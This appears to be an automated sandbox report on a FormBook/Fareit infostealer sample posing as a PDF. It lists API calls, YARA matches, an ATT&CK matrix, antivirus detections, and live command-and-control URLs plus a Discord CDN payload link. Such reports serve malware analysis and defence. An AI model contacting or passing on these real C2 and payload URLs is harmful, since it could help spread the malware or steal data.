Source: DOC209272621615.PDF.exe, 00000000.00000000.294385998.0000000000E00000.00000002.00020000.sdmp, DOC209272621615.PDF.exe, 00000000.00000000.296468765.0000000000E00000.00000002.00020000.sdmp, explorer.exe, 00000009.00000000.371944518.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000009.00000000.340106101.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000009.00000000.354080918.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000009.00000000.384004278.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: DOC209272621615.PDF.exe, 00000000.00000000.294385998.0000000000E00000.00000002.00020000.sdmp, DOC209272621615.PDF.exe, 00000000.00000000.296468765.0000000000E00000.00000002.00020000.sdmp, explorer.exe, 00000009.00000000.371944518.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000009.00000000.340106101.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000009.00000000.354080918.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000009.00000000.384004278.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000009.00000000.400381933.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000009.00000000.371055786.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000009.00000000.383961259.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000009.00000000.355102319.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,		0_2_00405E80
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,		6_2_00405E80
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: GetLocaleInfoA,		6_2_0040B954
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: LdrInitializeThunk,GetLocaleInfoA,		6_2_0040B9A0
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,		10_2_00405E80
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: GetLocaleInfoA,		10_2_0040B954
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: LdrInitializeThunk,GetLocaleInfoA,		10_2_0040B9A0
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,		10_2_00405F8C
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,		10_2_03595784
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: GetLocaleInfoA,		10_2_0359A3F4
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Code function: LdrInitializeThunk,GetLocaleInfoA,		10_2_0359A440

Queries the cryptographic machine GUID

Show sources

Source: C:\Users\user\Contacts\Wkklnmcz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Contains functionality to query local / system time

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe

Code function: 0_2_0040A39C GetLocalTime,

0_2_0040A39C

Contains functionality to query windows version

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe

Code function: 0_2_004605D0 GetVersion,

0_2_004605D0

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 12.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.460149911.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.352614232.000000000380E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.333032851.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.376476666.0000000010064000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.391644403.0000000005D72000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.352808142.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.455193853.0000000000AC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.348032682.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.348616604.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.390610840.0000000010064000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.337807666.00000000036CE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.816496652.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.461388859.0000000003450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.295287350.00000000038E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.429892109.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.337915217.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.810893268.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.334679188.00000000038E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.333478608.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.332508097.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.347239632.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.429963665.0000000000950000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.816582225.0000000004350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.411143671.0000000010064000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.299285834.00000000038E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.331906773.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.349144544.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.462816112.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.434946017.0000000072480000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 12.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.460149911.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.352614232.000000000380E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.333032851.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.376476666.0000000010064000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.391644403.0000000005D72000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.352808142.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.455193853.0000000000AC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.348032682.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.348616604.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.390610840.0000000010064000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.337807666.00000000036CE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.816496652.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.461388859.0000000003450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.295287350.00000000038E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.429892109.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.337915217.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.810893268.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.334679188.00000000038E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.333478608.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.332508097.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.347239632.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.429963665.0000000000950000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.816582225.0000000004350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.411143671.0000000010064000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.299285834.00000000038E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.331906773.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.349144544.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.462816112.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.434946017.0000000072480000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API 1	DLL Side-Loading 1	DLL Side-Loading 1	Deobfuscate/Decode Files or Information 1	Input Capture 2 1	System Time Discovery 1	Remote Services	Archive Collected Data 1	Exfiltration Over Other Network Medium	Ingress Tool Transfer 3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules 1	Application Shimming 1	Application Shimming 1	Obfuscated Files or Information 1 2	LSASS Memory	File and Directory Discovery 1	Remote Desktop Protocol	Screen Capture 1	Exfiltration Over Bluetooth	Encrypted Channel 1 1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Registry Run Keys / Startup Folder 1	Process Injection 11 1 2	Software Packing 1	Security Account Manager	System Information Discovery 1 1 5	SMB/Windows Admin Shares	Input Capture 2 1	Automated Exfiltration	Non-Application Layer Protocol 3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Registry Run Keys / Startup Folder 1	DLL Side-Loading 1	NTDS	Security Software Discovery 2 3 1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol 4	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading 1 1	LSA Secrets	Virtualization/Sandbox Evasion 2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion 2	Cached Domain Credentials	Process Discovery 2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection 11 1 2	DCSync	Application Window Discovery 1 1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll32 1	Proc Filesystem	Remote System Discovery 1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DOC209272621615.PDF.exe	33%	ReversingLabs	Win32.Infostealer.Fareit

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Contacts\Wkklnmcz.exe	33%	ReversingLabs	Win32.Infostealer.Fareit

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
12.0.mobsync.exe.72480000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
7.0.logagent.exe.72480000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
12.0.mobsync.exe.72480000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
0.2.DOC209272621615.PDF.exe.3590000.2.unpack	100%	Avira	TR/Hijacker.Gen		Download File
12.0.mobsync.exe.72480000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
7.0.logagent.exe.72480000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
6.2.Wkklnmcz.exe.3450000.2.unpack	100%	Avira	TR/Hijacker.Gen		Download File
10.2.Wkklnmcz.exe.72480000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
0.0.DOC209272621615.PDF.exe.3590000.3.unpack	100%	Avira	TR/Hijacker.Gen		Download File
12.0.mobsync.exe.72480000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
7.0.logagent.exe.72480000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
12.2.mobsync.exe.72480000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
6.2.Wkklnmcz.exe.72480000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
0.0.DOC209272621615.PDF.exe.3590000.6.unpack	100%	Avira	TR/Hijacker.Gen		Download File
10.2.Wkklnmcz.exe.3590000.2.unpack	100%	Avira	TR/Hijacker.Gen		Download File
7.2.logagent.exe.72480000.4.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
7.0.logagent.exe.72480000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

URLs

Source	Detection	Scanner	Label	Link
http://www.sa-pontianak.com/pvxz/?e0DDHLix=TAqp8mx20QUzgyvQGraUKSgK7ecLW6Kyu1royTDzc6juJCT2xEuV+4TJn9imIiw/7sSq&_FN4W=CV_PbjYpbVj	0%	Avira URL Cloud	safe
http://www.ncgf08.xyz/pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=kv1trFZowiadIe+O9wf8jU76F0yWsAfdW5MSCImgWwgiD9GBizL2DmUTWvRLYZu8pEo+	0%	Avira URL Cloud	safe
http://www.tourbox.xyz/pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=9jDi6R9VCoWG4rsAVGD1PHclw17CfU64luC7Gj+dkvBZl+crlrbAkIZhlDMaD53GUfpv	0%	Avira URL Cloud	safe
http://www.tourbox.xyz/pvxz/?e0DDHLix=9jDi6R9VCoWG4rsAVGD1PHclw17CfU64luC7Gj+dkvBZl+crlrbAkIZhlDMaD53GUfpv&8pqLWR=BzrlN6PpwXh	0%	Avira URL Cloud	safe
http://www.sumikkoremon.com/pvxz/?e0DDHLix=T99sF+FFCMRVIrN5sJoW9bSX1euAJ0OSqUAUXGTCOoP2/2ZrE3P4zH5359id1TPJ7WYx&_FN4W=CV_PbjYpbVj	0%	Avira URL Cloud	safe
https://sumikkoremon.com/	0%	Avira URL Cloud	safe
http://www.piiqrio.com/pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=GCiqwE+AocZAO2KzorVbe+5cAVR/sER9WTQIWH8MGwbYJAiKk6D+HvwNUH0eDnTOzOM/	0%	Avira URL Cloud	safe
http://sumikkoremon.com/wp-content/cache/autoptimize/js/autoptimize_11a5c4c4430017076e7a7babc5eec58b	0%	Avira URL Cloud	safe
http://www.neema.xyz/pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=vQJfxOtI611W+RxH9ddEKx+uNoigK/zmKccwwKjwQCCnv7782yRErdaxoTFecp96gNUO	0%	Avira URL Cloud	safe
http://www.hbjngs.com/pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=gP6rjQtpXSIvmASTmEYziIOwC4Gfkrp9Oew9+ghHkWFgU4GrN+F2/eFp8+5BM1VAZDt9	0%	Avira URL Cloud	safe
http://www.hwkm.net/pvxz/?e0DDHLix=3PJirK5cgl2FciVCq4PQLPbrqQd5ReNTXZ5Wt3Cj+i9zWbfEV8YElnpOrs676e/lB9CQ&_FN4W=CV_PbjYpbVj	0%	Avira URL Cloud	safe
http://www.jardingenesis.com/pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=5IYdhC0GHghhu3qU8D/jZG+rEeM2mibLCs+oL86uP0UJoc5Rrxh3LqrepKBtkhDSDZoq	0%	Avira URL Cloud	safe
http://www.finetipster.com/pvxz/?e0DDHLix=Czkl40VpJiNRQJS5lWJnKFxHKlnZ6CRMuI4G/gd+YABSgkcyWt+GOUfbjiYokSpGPyAa&_FN4W=CV_PbjYpbVj	0%	Avira URL Cloud	safe
http://www.sa-pontianak.com/pvxz/?e0DDHLix=TAqp8mx20QUzgyvQGraUKSgK7ecLW6Kyu1royTDzc6juJCT2xEuV+4TJn9imIiw/7sSq&8pqLWR=BzrlN6PpwXh	0%	Avira URL Cloud	safe
http://scheme.org/SiteNavigationElement	0%	Avira URL Cloud	safe
http://www.meishangtianhua.com/pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=lWYs4BNKo2NyazceVzv2HGKqsI/0suNqMdeNhVGKV3g2YeuVsAaP6gNudbn3yhvqV62w	0%	Avira URL Cloud	safe
http://www.cis136-tgarza.com/pvxz/?e0DDHLix=bCINk7waO+AAweJQetcshs4EXJImwvjnAC5D+DXKCvfhq7NWzMtc9ZOrSobl6zpZIFRB&_FN4W=CV_PbjYpbVj	0%	Avira URL Cloud	safe
http://www.era636.com/pvxz/?e0DDHLix=lq5nkvJODZO3vjBQ1IcTTlcoFI8MUDuIstt0HJAs3uVUg2aG8/bxRH4x4Hgr0vc	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
parkingpage.namecheap.com	198.54.117.211	true	false		high
cdn.discordapp.com	162.159.129.233	true	false		high
www.hwkm.net	64.69.40.19	true	false		high
www.neema.xyz	86.105.245.69	true	false		high
www.meishangtianhua.com	156.235.157.134	true	false		high
nc1cname.com	23.224.31.114	true	false		high
finetipster.com	197.248.5.16	true	false		high
jardingenesis.com	68.70.164.19	true	false		high
cis136-tgarza.com	66.235.200.145	true	false		high
localproperty.team	15.197.142.173	true	false		high
sa-pontianak.com	2.57.90.16	true	false		high
sumikkoremon.com	163.44.239.73	true	false		high
www.era636.com	165.32.109.217	true	false		high
www.hbjngs.com	154.81.158.75	true	false		high
tourbox.xyz	156.67.222.132	true	false		high
www.sumikkoremon.com	unknown	unknown	false		high
www.ncgf08.xyz	unknown	unknown	false		high
www.sa-pontianak.com	unknown	unknown	false		high
www.piiqrio.com	unknown	unknown	false		high
www.tourbox.xyz	unknown	unknown	false		high
www.9etmorea.info	unknown	unknown	false		high
www.jsboyat.com	unknown	unknown	false		high
www.jardingenesis.com	unknown	unknown	false		high
www.enterprisedaas.computer	unknown	unknown	false		high
www.localproperty.team	unknown	unknown	false		high
www.finetipster.com	unknown	unknown	false		high
www.cis136-tgarza.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.sa-pontianak.com/pvxz/?e0DDHLix=TAqp8mx20QUzgyvQGraUKSgK7ecLW6Kyu1royTDzc6juJCT2xEuV+4TJn9imIiw/7sSq&_FN4W=CV_PbjYpbVj	true	Avira URL Cloud: safe	unknown
http://www.ncgf08.xyz/pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=kv1trFZowiadIe+O9wf8jU76F0yWsAfdW5MSCImgWwgiD9GBizL2DmUTWvRLYZu8pEo+	true	Avira URL Cloud: safe	unknown
http://www.tourbox.xyz/pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=9jDi6R9VCoWG4rsAVGD1PHclw17CfU64luC7Gj+dkvBZl+crlrbAkIZhlDMaD53GUfpv	true	Avira URL Cloud: safe	unknown
http://www.tourbox.xyz/pvxz/?e0DDHLix=9jDi6R9VCoWG4rsAVGD1PHclw17CfU64luC7Gj+dkvBZl+crlrbAkIZhlDMaD53GUfpv&8pqLWR=BzrlN6PpwXh	true	Avira URL Cloud: safe	unknown
http://www.sumikkoremon.com/pvxz/?e0DDHLix=T99sF+FFCMRVIrN5sJoW9bSX1euAJ0OSqUAUXGTCOoP2/2ZrE3P4zH5359id1TPJ7WYx&_FN4W=CV_PbjYpbVj	true	Avira URL Cloud: safe	unknown
http://www.piiqrio.com/pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=GCiqwE+AocZAO2KzorVbe+5cAVR/sER9WTQIWH8MGwbYJAiKk6D+HvwNUH0eDnTOzOM/	true	Avira URL Cloud: safe	unknown
http://www.neema.xyz/pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=vQJfxOtI611W+RxH9ddEKx+uNoigK/zmKccwwKjwQCCnv7782yRErdaxoTFecp96gNUO	true	Avira URL Cloud: safe	unknown
http://www.hbjngs.com/pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=gP6rjQtpXSIvmASTmEYziIOwC4Gfkrp9Oew9+ghHkWFgU4GrN+F2/eFp8+5BM1VAZDt9	true	Avira URL Cloud: safe	unknown
http://www.hwkm.net/pvxz/?e0DDHLix=3PJirK5cgl2FciVCq4PQLPbrqQd5ReNTXZ5Wt3Cj+i9zWbfEV8YElnpOrs676e/lB9CQ&_FN4W=CV_PbjYpbVj	true	Avira URL Cloud: safe	unknown
http://www.jardingenesis.com/pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=5IYdhC0GHghhu3qU8D/jZG+rEeM2mibLCs+oL86uP0UJoc5Rrxh3LqrepKBtkhDSDZoq	true	Avira URL Cloud: safe	unknown
http://www.finetipster.com/pvxz/?e0DDHLix=Czkl40VpJiNRQJS5lWJnKFxHKlnZ6CRMuI4G/gd+YABSgkcyWt+GOUfbjiYokSpGPyAa&_FN4W=CV_PbjYpbVj	true	Avira URL Cloud: safe	unknown
http://www.sa-pontianak.com/pvxz/?e0DDHLix=TAqp8mx20QUzgyvQGraUKSgK7ecLW6Kyu1royTDzc6juJCT2xEuV+4TJn9imIiw/7sSq&8pqLWR=BzrlN6PpwXh	true	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflytssyuynbb	false		high
http://www.meishangtianhua.com/pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=lWYs4BNKo2NyazceVzv2HGKqsI/0suNqMdeNhVGKV3g2YeuVsAaP6gNudbn3yhvqV62w	true	Avira URL Cloud: safe	unknown
http://www.cis136-tgarza.com/pvxz/?e0DDHLix=bCINk7waO+AAweJQetcshs4EXJImwvjnAC5D+DXKCvfhq7NWzMtc9ZOrSobl6zpZIFRB&_FN4W=CV_PbjYpbVj	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://cdnjs.cloudflare.com/ajax/libs/Swiper/4.5.0/js/swiper.min.js?ver=5.8.2	rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	false		high
https://stats.wp.com/e-202148.js	rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	false		high
